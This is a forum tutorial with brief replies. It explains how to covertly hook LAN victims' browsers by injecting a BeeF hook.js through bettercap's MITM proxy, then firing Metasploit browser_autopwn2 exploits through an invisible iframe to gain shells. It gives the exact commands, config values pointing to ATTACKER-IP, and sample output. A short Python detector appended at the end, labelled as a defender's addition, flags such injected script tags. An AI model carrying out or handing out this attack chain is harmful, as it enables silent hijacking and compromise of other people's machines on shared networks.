Tutorial: pwn target's browser without Social Engineering -- BeeF - bettercap - Metasploit

willem_tee

Hi everyone,

This tutorial assumes that you already know your way around the basics of metasploit, bettercap and beef.

Versions used:
    - Bettercap  v1.5.8
    - Metasploit msfconsole 4.12.41-dev
    - BeeF 0.4.7.0-alpha

Objective:

The objective is to create a hook.js address in BeeF and inject it into any machine inside your LAN without the victim knowing or having to interact with it. Also, if by any chance their browser is exploitable, you can get a shell using it in conjunction with Metasploit's browser_autopwn2. If you need the newest BeeF version you can clone its git from master in a new folder and install it there. It won't interfere with your previous version.

Tests concluded:
    - Attacker's machine: Kali 2
    - Tested successfully in Victim's machines:
        OS: Windows XP SP2, 2012 Server, Win7, Mint 17.2 and OSX
        Browser: different versions of Safari, Firefox, Chrome and IE

BeeF prep:

First you have to enable the Metasploit extension. In the BeeF folder go to extensions/metasploit/config.yaml and set:

    enable: true
    host: ATTACKER-IP
    callback_host: ATTACKER-IP

Then close it and create a file in any folder you will be playing from. Personally I have a folder created in the same BeeF location to load my stuff. The file can be called anything you want; I'll call it beef_to_msf_load. Inside it you will have to provide the same parameters you put in extensions/metasploit/config.yaml before. So mine contains the following:

    load msgrpc ServerHost:ATTACKER-IP User=msf Pass=abc123 SSL=y

It goes without saying, but where it says ATTACKER-IP it has to be substituted with your Kali/Backbox/attacker-OS IP address.

Steps:

    $ msfconsole -r beef_to_msf_load

You'll have to get something similar to this:

    [*] Processing loadmsfparams for ERB directives.
    resource (loadmsfparams)> load msgrpc ServerHost:ATTACKER-IP User=msf Pass=abc123 SSL=y
    [*] MSGRPC Service:  ATTACKER-IP:55552  (SSL)
    [*] MSGRPC Username: msf
    [*] MSGRPC Password: abc123
    [*] Successfully loaded plugin: msgrpc

Load browser_autopwn2:

    msf> use auxiliary/server/browser_autopwn2
Open another terminal and start BeeF:

    $ ruby beef

or

    $ ./beef

Just load BeeF normally. You can clean the previous cache, if it's interfering, by attaching -x so it will be a clean load. You will have to get something similar to this:

    [*] Project Creator: Wade Alcorn (@WadeAlcorn)
    [*] Connecting to Metasploit on ATTACKER-IP:55552
    [*] Successful connection with Metasploit.
    [*] Loaded 295 Metasploit exploits.
    [*] Resetting the database for BeEF.
    [*] BeEF is loading. Wait a few seconds...
    [*] 13 extensions enabled.
    [*] 572 modules enabled.

Open another terminal for bettercap:

    $ bettercap -T TARGET-IP --proxy-module injectjs --js-url "http://ATTACKER-IP:3000/hook.js"

This will sniff the target's data and start injecting that hook.js of ours into their browsing without the victim noticing. So you don't need any Social Engineering for them to use that link; you'll be forcing the victim's browser to silently use your hook.js URL. It works wonderfully :) you'll see it appear in your BeeF panel sooner or later.

Optional - Metasploit:

You can load the newest version of browser_autopwn, called just browser_autopwn2, like we specified before:

    msf> use auxiliary/server/browser_autopwn2

Set the appropriate fields, which is pretty straightforward, and launch it. You will be launching a good bunch of exploits sorted by Metasploit by effectiveness.

    msf> use -z

This will give you another URL that the user has to browse to in order to trigger the exploits. Do we need to disconnect bettercap and reconnect using techniques such as DNS spoofing? Not at all! We already have BeeF to do that for us. So go to your target in the BeeF panel and open

    Commands > Misc > Create invisible Iframe

This is pure magic :) use that to force the already "owned" browser to read that new URL your Metasploit bulk of exploits just created and you will see it triggered. The victim will never know. What can happen, though, is that the target's browser shows a confirmation to the user depending on the exploit used (JS, Adobe, etc.), the browser used and its version, the OS, etc.

 

Hope you like it!

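Added here as a defender's check, not part of willem_tee's post or of BeeF, bettercap or Metasploit: a Python snippet that scans an HTTP response body for the pattern the injectjs step above produces (a plain-HTTP script tag loaded cross-origin from a LAN IP address), the kind of check a monitoring proxy or IDS could run on traffic it sees. The sample page, the hostname www.example.com and the address 192.168.1.50 are constructed; note that serving the site over HTTPS is what actually stops a LAN proxy from rewriting the page.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def _is_private_ip(host):
    """True only for a literal private/loopback IP; hostnames are not resolved."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def suspicious_scripts(page_url, html):
    """Return script URLs that are cross-origin, plain-HTTP and served from a
    private LAN address: how an injected hook.js shows up in a public page."""
    page_host = urlparse(page_url).hostname
    collector = _ScriptSrcCollector()
    collector.feed(html)
    hits = []
    for src in collector.srcs:
        u = urlparse(src)
        if u.scheme == "http" and u.hostname and u.hostname != page_host \
                and _is_private_ip(u.hostname):
            hits.append(src)
    return hits


# Constructed sample: one legitimate same-origin script, one injected tag.
SAMPLE_URL = "http://www.example.com/news"
SAMPLE_HTML = ('<html><head><script src="http://www.example.com/static/app.js"></script>'
               '<script src="http://192.168.1.50:3000/hook.js"></script></head>'
               '<body>hello</body></html>')

if __name__ == "__main__":
    print(suspicious_scripts(SAMPLE_URL, SAMPLE_HTML))
```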
willem_tee

Cheers guys :) happy if it's useful
matugm

Good job :)

cfernandez

nice.
